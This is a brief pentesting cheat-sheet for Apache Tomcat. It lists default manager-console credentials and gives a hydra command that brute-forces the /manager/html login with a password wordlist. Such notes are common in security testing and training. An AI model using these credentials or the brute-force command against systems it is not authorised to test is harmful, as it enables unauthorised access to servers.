Skip to content

Pentesting tomcat

Usually found on port 8080.

Default credentials:

admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
tomcat:tomca

Dictionaries:

Directory enumeration

Brute force

hydra -l tomcat -P /usr/share/wordlists/SecLists-master/Passwords/darkweb2017-top1000.txt -f $ip http-get /manager/html 
Last update: 2023-07-12
Created: April 28, 2023 23:16:19